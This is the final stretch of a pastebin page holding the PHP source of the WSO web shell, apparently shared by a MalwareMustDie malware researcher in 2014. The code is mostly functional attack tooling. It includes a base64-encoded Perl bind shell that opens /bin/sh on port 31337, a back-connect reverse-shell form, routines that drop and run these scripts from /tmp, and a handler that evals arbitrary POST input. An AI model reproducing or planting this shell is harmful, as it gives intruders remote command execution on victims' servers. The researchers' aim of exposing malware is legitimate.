  1857.     $bind_port_p    = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1858.     echo "<h1>Network tools</h1><div class=content>
  1859.         <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
  1860.         <span>Bind port to /bin/sh [perl]</span><br/>
  1861.         Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
  1862.         </form>
  1863.         <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
  1864.         <span>Back-connect  [perl]</span><br/>
  1865.         Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
  1866.         </form><br>";
  1867.     if (isset($_POST['p1'])) {
  1868.         function cf($f, $t)
  1869.         {
  1870.             $w = @fopen($f, "w") or @function_exists('file_put_contents');
  1871.             if ($w) {
  1872.                 @fwrite($w, @base64_decode($t));
  1873.                 @fclose($w);
  1874.             }
  1875.         }
  1876.         if ($_POST['p1'] == 'bpp') {
  1877.             cf("/tmp/bp.pl", $bind_port_p);
  1878.             $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
  1879.             echo "<pre class=ml1>$out\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
  1880.             unlink("/tmp/bp.pl");
  1881.         }
  1882.         if ($_POST['p1'] == 'bcp') {
  1883.             cf("/tmp/bc.pl", $back_connect_p);
  1884.             $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
  1885.             echo "<pre class=ml1>$out\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
  1886.             unlink("/tmp/bc.pl");
  1887.         }
  1888.     }
  1889.     echo '</div>';
  1890.     wsoFooter();
  1891. }
  1892. function actionRC()
  1893. {
  1894.     if (!@$_POST['p1']) {
  1895.         $a = array(
  1896.             "uname" => php_uname(),
  1897.             "php_version" => phpversion(),
  1898.             "wso_version" => WSO_VERSION,
  1899.             "safemode" => @ini_get('safe_mode')
  1900.         );
  1901.         echo serialize($a);
  1902.     } else {
  1903.         eval($_POST['p1']);
  1904.     }
  1905. }
  1906. if (empty($_POST['a']))
  1907.     if (isset($default_action) && function_exists('action' . $default_action))
  1908.         $_POST['a'] = $default_action;
  1909.     else
  1910.         $_POST['a'] = 'SecInfo';
  1911. if (!empty($_POST['a']) && function_exists('action' . $_POST['a']))
  1912.     call_user_func('action' . $_POST['a']);
  1913. exit;
  1914. ?>
  1915.  
  1916. #============
  1917. #MalwareMustDie!
  1918. @unixfreaxjp /malware/temp/001]$ date
  1919. Sun Sep  7 02:21:57 JST 2014
RAW Paste Data
Top